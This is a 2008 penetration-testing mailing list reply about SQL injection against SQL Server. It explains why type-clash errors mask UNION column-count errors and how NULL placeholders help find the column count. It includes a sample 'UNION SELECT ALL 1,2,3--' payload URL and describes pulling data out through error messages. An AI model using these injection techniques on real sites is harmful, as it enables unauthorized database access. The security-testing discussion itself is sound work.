Home page logo
/

pen-test logo Penetration Testing mailing list archives

Re: SQL Injection: Issue with UNION SELECT ALL
From: Francois Larouche <francois.larouche-ml () sqlpowerinjector com>
Date: Tue, 15 Jan 2008 10:44:52 -0800

Hi Zed,

see my answer inside the text
On Jan 11, 2008 12:16 AM, Francois Larouche
<francois.larouche-ml () sqlpowerinjector com> wrote:
I wouldn't agree with your statement Zed.

What he found was where the first conversion clash occurred. It seems
that your third expression is text field, no big deal. For some reason
SQL Server gives a higher priority on text is incompatible with int
error or any casting problem than the equal number of expressions in a
UNION clause. Believe me I learned that at my expense...

Chances are I misread you above statement, but what do you mean by "
or any casting problem "?
The nvarchar casting above - below works as expected
I might have not said it right but what I meant was that casting errors will have precedence on the error which state that the UNION doesn't have the right number of expressions. Hence, someone might think that he found the right number of expression but in fact he is just having his first type clash. And of course a casting with nvarchar will work but I was referring to your statement regarding the fact that he found or seemed to have found the right number of expressions (3) when in fact he got a casting problem. (see below)

you seem to have successfully enumerated the number of fields of the
first query at
----------------------------------------------------------------------------------
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT
ALL 1,2,3--
    Returns:
    Operand type clash: text is incompatible with int

The actual number is 16 if I counted well with his HAVING test.

Your problem now Joseph is just to make sure that you can have the right
format. If you use NULL it will work each time, however you won't get
anything back...
Partly true - oh well unless you found something else in your expense
:). You just have to pick one column that is displayed back and put
your data selection there if you want multiple data rows to be
returned back. Alternatively pick an int column and union select
strings on that. Detailed error messages - which you seem to have -
will get you the data back one at a time. Recurse on that with NOT IN
('data'...)
This time it's my fault, I didn't explain quite well what I meant by if you use only NULL you'll get nothing back. What I meant was if you just use SELECT * FROM SomeTable UNION SELECT NULL, NULL, NULL, NULL-- you'll get just the normal result like if you didn't use the UNION at all. The goal of using NULL is to be able to find out the exact number of expressions without having to bother with stupid casting or collation. Then when you have the right number of expressions you can use your trick or any other way you want to get information from the SQL Server.

Wish you well,

Cheers

Francois

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault